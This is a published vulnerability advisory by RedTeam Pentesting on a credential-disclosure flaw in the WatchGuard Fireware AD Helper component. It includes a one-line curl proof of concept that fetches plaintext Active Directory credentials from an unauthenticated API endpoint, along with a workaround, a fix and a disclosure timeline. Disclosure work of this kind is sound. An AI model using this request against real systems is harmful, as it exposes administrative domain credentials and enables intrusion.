168 lines
No EOL
5.2 KiB
Text
168 lines
No EOL
5.2 KiB
Text
# Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure
|
|
# Author: RedTeam Pentesting GmbH
|
|
# Date: 2020-03-11
|
|
# Vendor: https://www.watchguard.com
|
|
# Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
|
|
# CVE: N/A
|
|
|
|
Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component
|
|
|
|
RedTeam Pentesting discovered a credential-disclosure vulnerability in
|
|
the AD Helper component of the WatchGuard Fireware Threat Detection and
|
|
Response (TDR) service, which allows unauthenticated attackers to gain
|
|
Active Directory credentials for a Windows domain in plaintext.
|
|
|
|
|
|
Details
|
|
=======
|
|
|
|
Product: WatchGuard Fireware AD Helper Component
|
|
Affected Versions: 5.8.5.10233, < 5.8.5.10317
|
|
Fixed Versions: 5.8.5.10317
|
|
Vulnerability Type: Information Disclosure
|
|
Security Risk: high
|
|
Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
|
|
Vendor Status: fixed version released
|
|
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
|
|
Advisory Status: published
|
|
CVE: GENERIC-MAP-NOMATCH
|
|
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
|
|
|
|
|
|
Introduction
|
|
============
|
|
|
|
"Threat Detection and Response (TDR) is a cloud-based subscription
|
|
service that integrates with your Firebox to minimize the consequences
|
|
of data breaches and penetrations through early detection and automated
|
|
remediation of security threats."
|
|
|
|
"Threat Detection and Response includes the AD Helper component. If your
|
|
network has an Active Directory server, you can install AD Helper to
|
|
manage automated installation and updates of Host Sensors on your
|
|
network."
|
|
|
|
(from the vendor's homepage)
|
|
|
|
|
|
More Details
|
|
============
|
|
|
|
By accessing the AD Helper's web interface, it was discovered that a
|
|
call to an API endpoint is made, which responds with plaintext
|
|
credentials to all configured domain controllers. There is no
|
|
authentication needed to use the described interface and the
|
|
installation instructions at [1] contain no indication of any way to
|
|
configure access control.
|
|
|
|
|
|
Proof of Concept
|
|
================
|
|
|
|
An HTTP GET request to the path "/domains/list" of the AD Helper
|
|
API returns, among others, the plaintext credentials to
|
|
all configured Windows domain controllers:
|
|
|
|
------------------------------------------------------------------------
|
|
$ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq .
|
|
|
|
{
|
|
"content": [
|
|
{
|
|
"id": 1,
|
|
"fullyQualifiedName": "example.com",
|
|
"logonDomain": "example.com",
|
|
"domainControllers": "dc1.example.com",
|
|
"username": "[DOMAIN_USER]",
|
|
"password": "[DOMAIN_PASSWORD]",
|
|
"uuid": "[...]",
|
|
"servers": [
|
|
{
|
|
[...]
|
|
}
|
|
]
|
|
}
|
|
],
|
|
"totalPages": 1,
|
|
"totalElements": 1,
|
|
"number": 0,
|
|
"numberOfElements": 1
|
|
}
|
|
------------------------------------------------------------------------
|
|
|
|
The same request and its response can be observed when initially accessing
|
|
the web interface. The discovered version of AD Helper responds with
|
|
the following server banner:
|
|
|
|
------------------------------------------------------------------------
|
|
jetty(winstone-5.8.5.10233-9.4.12.v20180830)
|
|
------------------------------------------------------------------------
|
|
|
|
It is likely that other versions of the AD Helper Component are
|
|
vulnerable as well.
|
|
|
|
|
|
Workaround
|
|
==========
|
|
|
|
Ensure API of the AD Helper Component is not reachable over the network,
|
|
for example by putting it behind a Firewall.
|
|
|
|
|
|
Fix
|
|
===
|
|
|
|
Update to Version 5.8.5.10317 or later.
|
|
|
|
|
|
Security Risk
|
|
=============
|
|
|
|
No authentication is needed to access AD Helper's web interface and the
|
|
installation instructions at [1] describe that configured domain user
|
|
accounts must possess at least the following privileges:
|
|
|
|
* Connect to the host
|
|
* Mount the share ADMIN$
|
|
* Create a file on the host
|
|
* Execute commands on the host
|
|
* Install software on the host
|
|
|
|
Access to the "ADMIN$" share implies a user with administrative
|
|
privileges. Therefore, this vulnerability poses a high risk.
|
|
|
|
|
|
Timeline
|
|
========
|
|
|
|
2020-02-12 Vulnerability identified
|
|
2020-02-19 Customer approved disclosure to vendor
|
|
2020-02-24 Tried to contact the German branch of WatchGuard
|
|
2020-02-27 Contacted the Dutch branch of WatchGuard
|
|
2020-02-28 Contact to ADHelper QA Team Lead established
|
|
2020-03-02 Advisory draft sent for verification
|
|
2020-03-10 Vendor released fixed version and blog post
|
|
2020-03-11 CVE ID requested
|
|
2020-03-11 Advisory released
|
|
|
|
|
|
References
|
|
==========
|
|
|
|
[1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
|
|
|
|
|
|
RedTeam Pentesting GmbH
|
|
=======================
|
|
|
|
RedTeam Pentesting offers individual penetration tests performed by a
|
|
team of specialised IT-security experts. Hereby, security weaknesses in
|
|
company networks or products are uncovered and can be fixed immediately.
|
|
|
|
As there are only few experts in this field, RedTeam Pentesting wants to
|
|
share its knowledge and enhance the public knowledge with research in
|
|
security-related areas. The results are made available as public
|
|
security advisories.
|
|
|
|
More information about RedTeam Pentesting can be found at:
|
|
https://www.redteam-pentesting.de/ |